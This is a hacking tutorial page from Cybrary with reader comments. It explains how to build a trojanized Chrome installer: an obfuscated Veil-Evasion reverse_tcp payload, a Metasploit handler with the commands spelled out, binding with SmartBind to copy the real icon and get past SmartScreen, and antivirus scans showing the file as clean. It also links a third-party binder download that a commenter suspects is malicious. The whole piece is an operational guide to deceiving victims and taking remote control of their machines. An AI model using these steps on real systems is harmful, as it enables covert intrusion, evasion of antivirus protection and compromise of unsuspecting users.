Windows Hacking 1: Injecting a Backdoor into a PE File

June 20, 2016 | Views: 15743

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

Welcome back Cybrarians,

In the hacking world, being stealthy and undetectable is the number one priority after anonymity. Creating custom attacks that seem very real is an art that needs creativity and patience. Fooling the user into the hacker’s trap is not easy as the old days.Therefore, new ways are created to cover all  the necessary details to accomplish the mission effectively.

Today’s tutorial will cover how to create an innocuous looking backdoor and bind it with a legitimate executable file to gain the victim’s trust. We’ll choose a reverse_tcp  as our payload type, and Chrome setup as the legitimate executable program.

Note: Whatever you learn, now or in the future. are for educational purposes only. Use these tutorials at your own discretion.

Terminology:

Before we start with our tutorial, we need to have a basic understanding of the terms that are going to be used in the process:

1- Exploit: is the act of using the system weakness or (vulnerability) to gain an unauthorized access to it.

2- Vulnerability: is the weakness or the flaw that gives ability to the hacker to compromise the system and control it. Vulnerabilities can include software bugs, operating system vulnerabilities, misconfiguration of some programs, applications or devices.

3- Metasploit: is a framework that contains a group of tools that make exploitation and penetration process easier and more efficient.

4- Veil Evasion: is very well-known framework that generates encrypted payloads for variety of exploits that passes/evades anti-virus detectors.

5- Shell: an interface used to interact with a machine by executing user inputs.

6- Reverse_tcp shell: in general, any external connection that comes from the outside world (internet) to victim’s machine is blocked by the network firewalls or filtered ports.

The only way to get a TCP connection to that particular computer is by letting the victim start the connection from inside the network.

7- PE Portable Executable: is a  file format for executables.

PE file extensions include: .exe, .dll, .sys, .ocx, .cpl.

In this tutorial, we will be using an exe file. Now that the terminology is covered, Let’s begin hacking…….

 

Tutorial Requirements:

1- Veil Evasion: https://github.com/Veil-Framework/Veil-Evasion

2- Metasploit on Kali Linux

3- Windows Machine to emulate the victim

4- Smart Bind –>> is a tool that’s going to bind the payload with the real program. I uploaded it to Filedropper, but also you can Google it: http://www.filedropper.com/smartbinderv20_1

 

Tutorial Guidelines:

Step 1: Generate Veil Evasion Payload

Note: this step requires installing Veil Evasion first.

  • Start the tool by typing:

        >>>> ./Veil Evasion

v1.JPG

We can see that the new version of Veil Evasion has added additional modules. We now have 50 different payloads.

The tool is very simple to use; we’ll will start by listing all the available payloads by typing:

>>>> list

v2.JPG

We’re going to select number 34, which is reverse_tcp

  • After choosing our payload type, we set the local host and local port:

v3.JPG

  • Set Pyherion to Y for Yes. this is for encryption

  • Set LHOST as your Internal_IP

  • Set LPORT as your local port or leave it as the default.

v4.JPG

  • Type generate to create the payload

v5.JPG

  • Type the name of output file and hit enter.

Note: Try to choose a name that’s exactly similar to the real one.

v6.JPG

  • Choose number 2 for Pwnstaller to obfuscate the code for more evasion and hit enter. Sometimes, encryption method is not enough. You need to add obfuscation to get the intended results.

  • After you hit enter, the payload is going to be created and saved in /user/share/veil-output/compiled/nameOfFile

v7.JPG


Step 2: Starting a Handler with Metasploit

Now that our payload is ready to go, we’re going to set up our handler to ensure getting a connection back to our machine.

Note: a handler is basically creating a connection between the hacker’s machine and the victim either locally (local network) or over the internet.

  • First, start Metasploit by typing:

>>>> msfconsole

  • Create the handler, by typing:

       >>>>> use exploit/multi/handler

v8.JPG

  • Set the payload type:

          >>>>  set PAYLOAD windows/meterpreter/reverse_tcp

v9.JPG

  • Set the local host and local port (local network)

Note: The Listening IP and Port must match the ones in your payload. You cannot get connection by using different port number or IP.


v10.JPG

v11.JPG

  • After setting everything up, type exploit to start listening:

           >>>> exploit -j

v12.JPG


Step 3 : Bind the payload with an Executable File:

This step is very important for creating a legitimate looking backdoor that not only evades anti-virus detectors, but also looks like the real one.

We’re going to use a program known as SmartBind. The program binds your payload with legitimate executable file along with changing its icons to match the real one.

When you generate Veil-Evasion payload and try to use it on a Windows machine, the executable file would look suspicious, and not trustworthy. See the image below:

1 (1).PNG

Plus, when you click on it, the Windows SamrtScreen will warn you the application is unrecognized and not safe to run. As a result, the user may not run the app and we’ll fail our mission.

Note: The reason the app is not recognized because it lacks a certified digital signature or certificate.

8.PNG

Binding the payload with a legitimate application will pass this screen. Instead, you’ll get UAC (User Account Control) – this is the regular notification when you’re installing a new application.

9.PNG

Note: This program (SamrtBind) may alert your antivirus. Therefore, use it on your virtual machine.

3.PNG

  • Choose the icon that resembles the real program. In this case, we are using the Google icon.

  • Click add Files to add your payload.

  • Click add Files again to add your real executable program.

Once all of them are added, click on Save Output File and save it where you want. Then, click on Bind Files.

4.PNG

As you see the app looks greatly unsuspicious.

Step 4: Scanning Time

Now the application is ready, it’s time to scan it to make sure it’s 100 percent clean.

I used two anti-viruses for scanning: Kaspersky and Norton.

6 (1).PNG


VirtualBox_window10 Clone_15_06_2016_12_18_13.png

As you see, both of these anti-viruses marked it a CLEANNN!!!!

 

Step 5: Getting a Meterpreter

Once the victim clicks on the file, he’ll notice nothing. The program will open normally without any problems. However, the payload is executed and you should see a meterpreter .

11.JPG

Note: I did not cover how to send the payload. This is part of another series (Social Engineering).


That’s all for today’s tutorial. Thank you for reading and stay tuned for more.

@Z33MAXX

Share with Friends
FacebookTwitterGoogle+LinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterGoogle+LinkedInEmail
Ready to share your knowledge and expertise?
19 Comments
  1. Doesnt’ exist: http://www.filedropper.com/smartbinderv20_1. Just wondering – the whole PoC looks nice but – considering no details on smart bind I would sniff some kind of SE. It is certainly really strange it is not detectable by google. Either check the link, drop it to the legitimate location or this tutor should be marked as potentially unwanted and will be reported as malicious to the owners.

  2. Nice Tutorial

Page 4 of 4«1234
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Cybrary On The Go

Get the Cybrary app for Android for online and offline viewing of our lessons.

Get it on Google Play
 

Support Cybrary

Donate Here to Get This Month's Donor Badge

 
Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel